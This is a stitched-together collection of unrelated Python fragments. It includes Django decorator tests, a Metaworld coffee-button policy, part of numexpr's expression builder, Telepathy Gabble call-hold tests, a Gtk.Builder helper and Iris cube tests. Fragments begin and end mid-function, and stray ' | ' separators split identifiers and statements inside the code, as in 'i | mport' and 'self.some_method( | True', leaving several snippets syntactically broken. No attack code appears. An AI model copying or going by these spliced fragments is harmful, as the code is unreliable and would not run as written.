assert isinstance(response, http.HttpResponseBadRequest)
assert force_text(response.content) == '{"msg": "error"}'
assert response['Content-Type'] == 'application/json'
def test_json_view_status():
def func(request):
return {'x': 1}
response = decorators.json_view(func, status_code=202)(mock.Mock())
assert response.status_code == 202
def test_json_view_response_status():
response = decorators.json_response({'msg': 'error'}, status_code=202)
assert force_text(response.content) == '{"msg": "error"}'
assert response['Content-Type'] == 'application/json'
assert response.status_code == 202
class TestLoginRequired(TestCase):
def setUp(self):
super(TestLoginRequired, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = RequestFactory().get('/path')
self.request.user = AnonymousUser()
self.request.session = {}
def test_normal(self):
func = decorators.login_required(self.f)
response = func(self.request)
assert not self.f.called
assert response.status_code == 302
assert response['Location'] == fxa_login_link(
request=self.request, to='/path')
def test_no_redirect(self):
func = decorators.login_required(self.f, redirect=False)
response = func(self.request)
assert not self.f.called
assert response.status_code == 401
def test_decorator_syntax(self):
# @login_required(redirect=False)
func = decorators.login_required(redirect=False)(self.f)
response = func(self.request)
assert not self.f.called
assert response.status_code == 401
def test_no_redirect_success(self):
func = decorators.login_required(redirect=False)(self.f)
self.request.user = UserProfile()
func(self.request)
assert self.f.called
class TestSetModifiedOn(TestCase):
fixtures = ['base/users']
@decorators.set_modified_on
def some_method(self, worked):
return worked
def test_set_modified_on(self):
user = UserProfile.objects.latest('pk')
self.some_method(
| True, set_modified_on=user.serializable_reference())
assert UserProfile.objects.get(pk=user.pk).modified.date() == (
datetime.today().date())
def test_not_set_modified_on(self):
yesterday = datetime.today() - timedelta(days=1)
qs = UserProfile.objects.all()
qs.update(modified=yesterday)
user = qs.latest('pk')
self.some_method(
False, set_modified_on=user.serializable_reference())
date = | UserProfile.objects.get(pk=user.pk).modified.date()
assert date < datetime.today().date()
class TestPermissionRequired(TestCase):
empty_permission = amo.permissions.NONE
def setUp(self):
super(TestPermissionRequired, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = mock.Mock()
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_not_allowed(self, action_allowed):
action_allowed.return_value = False
func = decorators.permission_required(self.empty_permission)(self.f)
with self.assertRaises(PermissionDenied):
func(self.request)
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_allowed(self, action_allowed):
action_allowed.return_value = True
func = decorators.permission_required(self.empty_permission)(self.f)
func(self.request)
assert self.f.called
@mock.patch('olympia.access.acl.action_allowed')
def test_permission_allowed_correctly(self, action_allowed):
func = decorators.permission_required(
amo.permissions.ANY_ADMIN)(self.f)
func(self.request)
action_allowed.assert_called_with(
self.request, amo.permissions.AclPermission('Admin', '%'))
|
from __future__ import unicode_literals
from django.apps i | mport AppConfig
class RfhistoryConfig(AppConfig):
name = 'RFHis | tory'
|
import numpy as np
from metaworld.policies.action import Action
from metaworld.policies.policy import Policy, assert_fully_parsed, move
class SawyerCoffeeButtonV1Policy(Policy):
@staticmethod
@assert_fully_parsed
def _parse_obs(obs):
return {
'hand_pos': obs[:3],
'mug_pos': obs[3:6],
'unused_info': obs[6:],
}
def get_action(self, obs):
| o_d = self._parse_obs(obs)
action = Action({
'delta_pos': np.arange(3),
'grab_effort': 3
})
action['delta_pos'] = move(o_d['hand_pos'], to_xyz=self._desired_pos(o_d), p=10.)
action['grab_effort'] = -1.
return action.array
@staticmethod
def _desired_pos(o_d):
pos_curr = o_d['hand_pos']
pos_mug = o_d['mug_pos'] + np.array([.0, .0, .01])
if abs(pos_curr[0] - pos_mug[0]) > 0.02:
| return np.array([pos_mug[0], pos_curr[1], .28])
else:
return pos_curr + np.array([.0, .1, .0])
|
from sqlalchemy import *
from sqlalchemy.orm import *
from sqlalchemy.ext.de | clarative import declarative_base
from geoalchemy import GeometryColumn, LineString, GeometryDDL
engine = create_engine('postgres://michel@localhost/featureserver', echo=False)
session = sessionmaker(bind=engine)()
metadata = MetaData(engine)
Base = declarative_base(metadata=metadata)
class Road(Base):
__tablename__ = 'fs_alchemy_road'
id = Column(Integer, prima | ry_key=True)
name = Column(Unicode, nullable=False)
width = Column(Integer)
geom = GeometryColumn(LineString(2))
GeometryDDL(Road.__table__)
|
"""
WSGI config for artge projec | t.
It exposes the WSGI callable as a module-level variable named ``application``.
For more informatio | n on this file, see
https://docs.djangoproject.com/en/dev/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "artge.settings")
application = get_wsgi_application()
|
f | rom FileBundleTestCase import FileBundleTestCase
import unittest
|
class BasicTests(unittest.TestCase, FileBundleTestCase):
pass |
: 'double', complex: 'complex', str: 'str'}
kind_to_type = {'bool': bool, 'int': int, 'long': long, 'float': float,
'double': double, 'complex': complex, 'str': str}
kind_rank = ['bool', 'int', 'long', 'float', 'double', 'complex', 'none']
from numexpr import interpreter
class Expression(object):
def __init__(self):
object.__init__(self)
def __getattr__(self, name):
if name.startswith('_'):
return self.__dict__[name]
else:
return VariableNode(name, default_kind)
E = Expression()
class Context(threading.local):
initialized = False
def __init__(self, dict_):
if self.initialized:
raise SystemError('__init__ called too many times')
self.initialized = True
self.__dict__.update(dict_)
def get(self, value, default):
return self.__dict__.get(value, default)
def get_current_context(self):
return self.__dict__
def set_new_context(self, dict_):
self.__dict__.update(dict_)
# This will be called each time the local object is used in a separate thread
_context = Context({})
def get_optimization():
return _context.get('optimization', 'none')
# helper functions for creating __magic__ methods
def ophelper(f):
def func(*args):
args = list(args)
for i, x in enumerate(args):
if isConstant(x):
args[i] = x = ConstantNode(x)
if not isinstance(x, ExpressionNode):
raise TypeError("unsupported object type: %s" % (type(x),))
return f(*args)
func.__name__ = f.__name__
func.__doc__ = f.__doc__
func.__dict__.update(f.__dict__)
return func
def allConstantNodes(args):
"returns True if args are all ConstantNodes."
for x in args:
if not isinstance(x, ConstantNode):
return False
return True
def isConstant(ex):
"Returns True if ex is a constant scalar of an allowed type."
return isinstance(ex, (bool, int, long, float, double, complex, str))
def commonKind(nodes):
node_kinds = [node.astKind for node in nodes]
str_count = node_kinds.count('str')
if 0 < str_count < len(node_kinds): # some args are strings, but not all
raise TypeError("strings can only be operated with strings")
if str_count > 0: # if there are some, all of them must be
return 'str'
n = -1
for x in nodes:
n = max(n, kind_rank.index(x.astKind))
return kind_rank[n]
max_int32 = 2147483647
min_int32 = -max_int32 - 1
def bestConstantType(x):
if isinstance(x, str): # ``numpy.string_`` is a subclass of ``str``
return str
# ``long`` objects are kept as is to allow the user to force
# promotion of results by using long constants, e.g. by operating
# a 32-bit array with a long (64-bit) constant.
if isinstance(x, (long, numpy.int64)):
return long
# ``double`` objects are kept as is to allow the user to force
# promotion of results by using double constants, e.g. by operating
# a float (32-bit) array with a double (64-bit) constant.
if isinstance(x, (double)):
return double
# Numeric conversion to boolean values is not tried because
# ``bool(1) == True`` (same for 0 and False), so 0 and 1 would be
# interpreted as booleans when ``False`` and ``True`` are already
# supported.
if isinstance(x, (bool, numpy.bool_)):
return bool
# ``long`` is not explicitly needed since ``int`` automatically
# returns longs when needed (since Python 2.3).
# The duality of float and double in Python avoids that we have to list
# ``double`` too.
for converter in int, float, complex:
try:
y = converter(x)
except StandardError, err:
continue
if x == y:
# Constants needing more than 32 bits are always
# considered ``long``, *regardless of the platform*, so we
# can clearly tell 32- and 64-bit constants apart.
if converter is int and not (min_int32 <= x <= max_int32):
return long
return converter
def getKind(x):
converter = bestConstantType(x)
return type_to_kind[converter]
def binop(opname, reversed=False, kind=None):
# Getting the named method from self (after reversal) does not
# always work (e.g. int constants do not have a __lt__ method).
opfunc = getattr(operator, "__%s__" % opname)
@ophelper
def operation(self, other):
if reversed:
self, other = other, self
if allConstantNodes([self, other]):
return ConstantNode(opfunc(self.value, other.value))
else:
return OpNode(opname, (self, other), kind=kind)
return operation
def func(func, minkind=None, maxkind=None):
@ophelper
def function(*args):
if allConstantNodes(args):
return ConstantNode(func(*[x.value for x in args]))
kind = commonKind(args)
if kind in ('int', 'long'):
# Exception for following NumPy casting rules
kind = 'double'
else:
# Apply regular casting rules
if minkind and kind_rank.index(minkind) > kind_rank.index(kind):
kind = minkind
if maxkind and kind_rank. | index(maxkind) < kind_rank.index(kind):
kind = maxkind
return FuncNode(func.__name__, args, kind)
return function
@ophelper
def where_func(a, b, c):
if isinstance(a, ConstantNode):
raise ValueError("too many dimensions")
if allConstantNodes([a,b,c]):
return ConstantNode(numpy.where(a, b, c))
return FuncNode('where', [a,b,c])
def encode_axis(axis):
if isinstance(axis, Con | stantNode):
axis = axis.value
if axis is None:
axis = interpreter.allaxes
else:
if axis < 0:
axis = interpreter.maxdims - axis
if axis > 254:
raise ValueError("cannot encode axis")
return RawNode(axis)
def sum_func(a, axis=-1):
axis = encode_axis(axis)
if isinstance(a, ConstantNode):
return a
if isinstance(a, (bool, int, long, float, double, complex)):
a = ConstantNode(a)
return FuncNode('sum', [a, axis], kind=a.astKind)
def prod_func(a, axis=-1):
axis = encode_axis(axis)
if isinstance(a, (bool, int, long, float, double, complex)):
a = ConstantNode(a)
if isinstance(a, ConstantNode):
return a
return FuncNode('prod', [a, axis], kind=a.astKind)
@ophelper
def div_op(a, b):
if get_optimization() in ('moderate', 'aggressive'):
if (isinstance(b, ConstantNode) and
(a.astKind == b.astKind) and
a.astKind in ('float', 'double', 'complex')):
return OpNode('mul', [a, ConstantNode(1./b.value)])
return OpNode('div', [a,b])
@ophelper
def pow_op(a, b):
if allConstantNodes([a,b]):
return ConstantNode(a**b)
if isinstance(b, ConstantNode):
x = b.value
if get_optimization() == 'aggressive':
RANGE = 50 # Approximate break even point with pow(x,y)
# Optimize all integral and half integral powers in [-RANGE, RANGE]
# Note: for complex numbers RANGE could be larger.
if (int(2*x) == 2*x) and (-RANGE <= abs(x) <= RANGE):
n = int(abs(x))
ishalfpower = int(abs(2*x)) % 2
def multiply(x, y):
if x is None: return y
return OpNode('mul', [x, y])
r = None
p = a
mask = 1
while True:
if (n & mask):
r = multiply(r, p)
mask <<= 1
if mask > n:
break
p = OpNode('mul', [p,p])
if ishalfpower:
kind = commonKind([a])
if kind in ('int', 'long'): kind = 'double'
r = multiply(r, OpNode('sqrt', [a], kind))
if r is None:
r = OpNode('ones_like', [a])
if x < 0:
|
State()
assert hold_state[0] == cs.HS_HELD, hold_state
# Check that Gabble doesn't send another <hold/>, or send <unhold/>
# before we change our minds.
q.forbid_events(self.unhold_event + self.hold_event)
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
call_async(q, chan.Hold, 'RequestHold', True)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_HOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
cstream.CompleteReceivingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
cstream.CompleteSendingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_HELD, cs.HSR_REQUESTED]),
)
hold_state = chan.Hold.GetHoldState()
assert hold_state[0] == cs.HS_HELD, hold_state
sync_stream(q, stream)
q.unforbid_events(self.unhold_event + self.hold_event)
# ---- Test 10: attempting to unhold fails in the sending bit ----
# Check that Gabble doesn't send another <hold/>, or send <unhold/> even
# though unholding fails.
q.forbid_events(self.unhold_event + self.hold_event)
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-return', method='RequestHold', value=()),
)
cstream.ReportSendingFailure(0, "", "",
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_HOLD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
cstream.CompleteReceivingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_HELD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
# ---- Test 11: attempting to unhold fails in the receiving bit ----
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-return', method='RequestHold', value=()),
)
cstream.ReportReceivingFailure(0, "", "",
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_HOLD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_STOP],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
cstream.CompleteSendingStateChange(
cs.CALL_STREAM_FLOW_STATE_STOPPED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_HELD, cs.HSR_RESOURCE_NOT_AVAILABLE]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_STOPPED],
interface = cs.CALL_STREAM_IFACE_MEDIA),
)
sync_stream(q, stream)
q.unforbid_events(self.unhold_event + self.hold_event)
# ---- Test 12: when we successfully unhold, the peer gets <unhold/> ---
q.forbid_events(self.unhold_event)
call_async(q, chan.Hold, 'RequestHold', False)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged',
args=[cs.HS_PENDING_UNHOLD, cs.HSR_REQUESTED]),
EventPattern('dbus-signal', signal='SendingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-signal', signal='ReceivingStateChanged',
args = [cs.CALL_STREAM_FLOW_STATE_PENDING_START],
interface = cs.CALL_STREAM_IFACE_MEDIA),
EventPattern('dbus-return', method='RequestHold', value=()),
)
# Ensure that if Gabble sent the <unhold/> stanza too early it's already
# arrived.
sync_stream(q, stream)
q.unforbid_events(self.unhold_event)
c | stream.CompleteReceivingStateChange(
cs.CALL_STREAM_FLOW_S | TATE_STARTED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
cstream.CompleteSendingStateChange(
cs.CALL_STREAM_FLOW_STATE_STARTED,
dbus_interface = cs.CALL_STREAM_IFACE_MEDIA)
q.expect_many(
EventPattern('dbus-signal', signal='HoldStateChanged |
from .pyvatebin impor | t ap | p
|
# coding=utf-8
"""
Lets the user assign groups to all cards, which have no group yet.
"""
import data
cards = [data.database_manager.get_card(card_id) for card_id, in data.database_manager.get_connection().execute(
"SELECT card_id FROM card WHERE card_id NOT IN (SELECT | card_id FROM card_group_membership)").fetchall()]
print(len(cards))
new_cards = []
for card in cards:
if card not in new_cards:
new_cards.append(card)
print(len(new_cards))
cards = new_cards
group_name = "adeo-11"
for card_id, translations in cards:
for translation in translations:
print(translation)
| group = input("group_name? {} > ".format(group_name)).strip(" ")
if group != "":
group_name = group
data.database_manager.add_card_to_group(card_id, group_name)
|
from markdown import markdown
from django.db import models
from django.core.urlresolvers import reverse
class Tag(models.Model):
"""
A subject-matter tag for blog posts
"""
slug = models.CharField(max_length=200, unique=True)
name = models.SlugField(max_length=200, unique=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('tag', args=(self.slug,))
class Meta:
ordering = ('name',)
class Post(models.Model):
"""
A blog post
"""
title = models.CharField(max_length=200, unique=True)
slug = models.SlugField(max_length=50, unique=True)
body = models.TextField()
date = models.DateField(auto_now_add=True)
tags = mode | ls.ManyToManyField(Tag)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('post', args=(self.slug,))
def teaser(self):
return ' '.join([self.body[:100], '...'])
def | body_html( self ):
return markdown(self.body)
class Meta:
ordering = ('title', 'date', 'body')
|
; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
### BEGIN LICENSE
# Copyright (C) 2012 Jono Bacon <jono@ubuntu.com>
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more d | etails.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
### END LICENSE
### DO NOT EDIT THIS FILE ###
'''Enhances builder connections, provides object to access glade objects'''
from gi.repository import GObject, Gtk # pylint: disable=E0611
import inspect
import functools
import logging
logger = logging.getLogger('accomplishments_viewer_lib')
from xml.etree.cElementTree import ElementTree
# this module is | big so uses some conventional prefixes and postfixes
# *s list, except self.widgets is a dictionary
# *_dict dictionary
# *name string
# ele_* element in a ElementTree
# pylint: disable=R0904
# the many public methods is a feature of Gtk.Builder
class Builder(Gtk.Builder):
''' extra features
connects glade defined handler to default_handler if necessary
auto connects widget to handler with matching name or alias
auto connects several widgets to a handler via multiple aliases
allow handlers to lookup widget name
logs every connection made, and any on_* not made
'''
def __init__(self):
Gtk.Builder.__init__(self)
self.widgets = {}
self.glade_handler_dict = {}
self.connections = []
self._reverse_widget_dict = {}
# pylint: disable=R0201
# this is a method so that a subclass of Builder can redefine it
def default_handler(self, handler_name, filename, *args, **kwargs):
'''helps the apprentice guru
glade defined handlers that do not exist come here instead.
An apprentice guru might wonder which signal does what he wants,
now he can define any likely candidates in glade and notice which
ones get triggered when he plays with the project.
this method does not appear in Gtk.Builder'''
logger.debug('''tried to call non-existent function:%s()
expected in %s
args:%s
kwargs:%s''', handler_name, filename, args, kwargs)
# pylint: enable=R0201
def get_name(self, widget):
''' allows a handler to get the name (id) of a widget
this method does not appear in Gtk.Builder'''
return self._reverse_widget_dict.get(widget)
def add_from_file(self, filename):
'''parses xml file and stores wanted details'''
Gtk.Builder.add_from_file(self, filename)
# extract data for the extra interfaces
tree = ElementTree()
tree.parse(filename)
ele_widgets = tree.getiterator("object")
for ele_widget in ele_widgets:
name = ele_widget.attrib['id']
widget = self.get_object(name)
# populate indexes - a dictionary of widgets
self.widgets[name] = widget
# populate a reversed dictionary
self._reverse_widget_dict[widget] = name
# populate connections list
ele_signals = ele_widget.findall("signal")
connections = [
(name,
ele_signal.attrib['name'],
ele_signal.attrib['handler']) for ele_signal in ele_signals]
if connections:
self.connections.extend(connections)
ele_signals = tree.getiterator("signal")
for ele_signal in ele_signals:
self.glade_handler_dict.update(
{ele_signal.attrib["handler"]: None}
)
def connect_signals(self, callback_obj):
'''connect the handlers defined in glade
reports successful and failed connections
and logs call to missing handlers'''
filename = inspect.getfile(callback_obj.__class__)
callback_handler_dict = dict_from_callback_obj(callback_obj)
connection_dict = {}
connection_dict.update(self.glade_handler_dict)
connection_dict.update(callback_handler_dict)
for item in connection_dict.items():
if item[1] is None:
# the handler is missing so reroute to default_handler
handler = functools.partial(
self.default_handler, item[0], filename)
connection_dict[item[0]] = handler
# replace the run time warning
logger.warn("expected handler '%s' in %s", item[0], filename)
# connect glade define handlers
Gtk.Builder.connect_signals(self, connection_dict)
# let's tell the user how we applied the glade design
for connection in self.connections:
widget_name, signal_name, handler_name = connection
logger.debug("connect builder by design '%s', '%s', '%s'",
widget_name, signal_name, handler_name)
def get_ui(self, callback_obj=None, by_name=True):
'''Creates the ui object with widgets as attributes
connects signals by 2 methods
this method does not appear in Gtk.Builder'''
result = UiFactory(self.widgets)
# Hook up any signals the user defined in glade
if callback_obj is not None:
# connect glade define handlers
self.connect_signals(callback_obj)
if by_name:
auto_connect_by_name(callback_obj, self)
return result
# pylint: disable=R0903
# this class deliberately does not provide any public interfaces
# apart from the glade widgets
class UiFactory():
''' provides an object with attributes as glade widgets'''
def __init__(self, widget_dict):
self._widget_dict = widget_dict
for (widget_name, widget) in widget_dict.items():
setattr(self, widget_name, widget)
# Mangle any non-usable names (like with spaces or dashes)
# into pythonic ones
cannot_message = """cannot bind ui.%s, name already exists
consider using a pythonic name instead of design name '%s'"""
consider_message = """consider using a pythonic name instead of design name '%s'"""
for (widget_name, widget) in widget_dict.items():
pyname = make_pyname(widget_name)
if pyname != widget_name:
if hasattr(self, pyname):
logger.debug(cannot_message, pyname, widget_name)
else:
logger.debug(consider_message, widget_name)
setattr(self, pyname, widget)
def iterator():
'''Support 'for o in self' '''
return iter(widget_dict.values())
setattr(self, '__iter__', iterator)
def __getitem__(self, name):
'access as dictionary where name might be non-pythonic'
return self._widget_dict[name]
# pylint: enable=R0903
def make_pyname(name):
''' mangles non-pythonic names into pythonic ones'''
pyname = ''
for character in name:
if (character.isalpha() or character == '_' or
(pyname and character.isdigit())):
pyname += character
else:
pyname += '_'
return pyname
# Until bug https://bugzilla.gnome.org/show_bug.cgi?id=652127 is fixed, we
# need to reimplement inspect.getmembers. GObject introspection doesn't
# play nice with it.
def getmembers(obj, check):
members = []
for k in dir(obj):
try:
attr = getattr(obj, k)
except:
continue
if check(attr):
members.append((k, attr))
members.sort()
return members
def dict_from_callback_obj(callback_obj):
'''a dictionary interface to callback_obj'''
methods = getmembers(callback_obj, inspect.ismethod)
aliased_methods = [x[1] for x in methods if hasattr(x[1], 'aliases')]
|
e.add_aux_coord(scalar_aux_coord)
self.assertEqual(set(cube.aux_coords), {scalar_dim_coord, scalar_aux_coord})
# Various options for dims
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, [])
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, ())
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord, None)
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
cube = self.cube.copy()
cube.add_aux_coord(scalar_dim_coord)
self.assertEqual(cube.aux_coords, (scalar_dim_coord,))
def test_add_aux_coord(self):
y_another = iris.coords.DimCoord(np.array([ 2.5, 7.5, 12.5]), long_name='y_another')
# DimCoords can live in cube.aux_coords
self.cube.add_aux_coord(y_another, 0)
self.assertEqual(self.cube.dim_coords, ())
self.assertEqual(self.cube.coords(), [y_another])
self.assertEqual(self.cube.aux_coords, (y_another,))
# AuxCoords in cube.aux_coords
self.cube.add_aux_coord(self.xy, [0, 1])
self.assertEqual(self.cube.dim_coords, ())
self.assertEqual(self.cube.coords(), [y_another, self.xy])
self.assertEqual(set(self.cube.aux_coords), {y_another, self.xy})
# Lengths must match up
cube = self.cube.copy()
with self.assertRaises(ValueError):
cube.add_aux_coord(self.xy, [1, 0])
def test_remove_coord(self):
self.cube.add_dim_coord(self.y, 0)
self.cube.add_dim_coord(self.x, 1)
self.cube.add_aux_coord(self.xy, (0, 1))
self.assertEqual(set(self.cube.coords()), {self.y, self.x, self.xy})
self.cube.remove_coord('xy')
self.assertEqual(set(self.cube.coords()), {self.y, self.x})
self.cube.remove_coord('x')
self.assertEqual(self.cube.coords(), [self.y])
self.cube.remove_coord('y')
self.assertEqual(self.cube.coords(), [])
def test_immutable_dimcoord_dims(self):
# Add DimCoord to dimension 1
dims = [1]
| self.cube.add_dim_coord(self.x, dims)
self.assertEqual(self.cube.coord_dims(self.x), (1, | ))
# Change dims object
dims[0] = 0
# Check the cube is unchanged
self.assertEqual(self.cube.coord_dims(self.x), (1,))
# Check coord_dims cannot be changed
dims = self.cube.coord_dims(self.x)
with self.assertRaises(TypeError):
dims[0] = 0
def test_immutable_auxcoord_dims(self):
# Add AuxCoord to dimensions (0, 1)
dims = [0, 1]
self.cube.add_aux_coord(self.xy, dims)
self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
# Change dims object
dims[0] = 1
dims[1] = 0
# Check the cube is unchanged
self.assertEqual(self.cube.coord_dims(self.xy), (0, 1))
# Check coord_dims cannot be changed
dims = self.cube.coord_dims(self.xy)
with self.assertRaises(TypeError):
dims[0] = 1
class TestStockCubeStringRepresentations(tests.IrisTest):
def setUp(self):
self.cube = iris.tests.stock.realistic_4d()
def test_4d_str(self):
self.assertString(str(self.cube))
def test_4d_repr(self):
self.assertString(repr(self.cube))
def test_3d_str(self):
self.assertString(str(self.cube[0]))
def test_3d_repr(self):
self.assertString(repr(self.cube[0]))
def test_2d_str(self):
self.assertString(str(self.cube[0, 0]))
def test_2d_repr(self):
self.assertString(repr(self.cube[0, 0]))
def test_1d_str(self):
self.assertString(str(self.cube[0, 0, 0]))
def test_1d_repr(self):
self.assertString(repr(self.cube[0, 0, 0]))
def test_0d_str(self):
self.assertString(str(self.cube[0, 0, 0, 0]))
def test_0d_repr(self):
self.assertString(repr(self.cube[0, 0, 0, 0]))
@tests.skip_data
class TestCubeStringRepresentations(IrisDotTest):
def setUp(self):
path = tests.get_data_path(('PP', 'simple_pp', 'global.pp'))
self.cube_2d = iris.load_cube(path)
# Generate the unicode cube up here now it's used in two tests.
unicode_str = six.unichr(40960) + u'abcd' + six.unichr(1972)
self.unicode_cube = iris.tests.stock.simple_1d()
self.unicode_cube.attributes['source'] = unicode_str
def test_dot_simple_pp(self):
# Test dot output of a 2d cube loaded from pp.
cube = self.cube_2d
cube.attributes['my_attribute'] = 'foobar'
self.check_dot(cube, ('file_load', 'global_pp.dot'))
pt = cube.coord('time')
# and with custom coord attributes
pt.attributes['monty'] = 'python'
pt.attributes['brain'] = 'hurts'
self.check_dot(cube, ('file_load', 'coord_attributes.dot'))
del pt.attributes['monty']
del pt.attributes['brain']
del cube.attributes['my_attribute']
# TODO hybrid height and dot output - relatitionship links
def test_dot_4d(self):
cube = iris.tests.stock.realistic_4d()
self.check_dot(cube, ('file_load', '4d_pp.dot'))
def test_missing_coords(self):
cube = iris.tests.stock.realistic_4d()
cube.remove_coord('time')
cube.remove_coord('model_level_number')
self.assertString(repr(cube),
('cdm', 'str_repr', 'missing_coords_cube.repr.txt'))
self.assertString(str(cube),
('cdm', 'str_repr', 'missing_coords_cube.str.txt'))
def test_cubelist_string(self):
cube_list = iris.cube.CubeList([iris.tests.stock.realistic_4d(),
iris.tests.stock.global_pp()])
self.assertString(str(cube_list), ('cdm', 'str_repr', 'cubelist.__str__.txt'))
self.assertString(repr(cube_list), ('cdm', 'str_repr', 'cubelist.__repr__.txt'))
def test_basic_0d_cube(self):
self.assertString(repr(self.cube_2d[0, 0]),
('cdm', 'str_repr', '0d_cube.__repr__.txt'))
self.assertString(six.text_type(self.cube_2d[0, 0]),
('cdm', 'str_repr', '0d_cube.__unicode__.txt'))
self.assertString(str(self.cube_2d[0, 0]),
('cdm', 'str_repr', '0d_cube.__str__.txt'))
def test_similar_coord(self):
cube = self.cube_2d.copy()
lon = cube.coord('longitude')
lon.attributes['flight'] = '218BX'
lon.attributes['sensor_id'] = 808
lon.attributes['status'] = 2
lon2 = lon.copy()
lon2.attributes['sensor_id'] = 810
lon2.attributes['ref'] = 'A8T-22'
del lon2.attributes['status']
cube.add_aux_coord(lon2, [1])
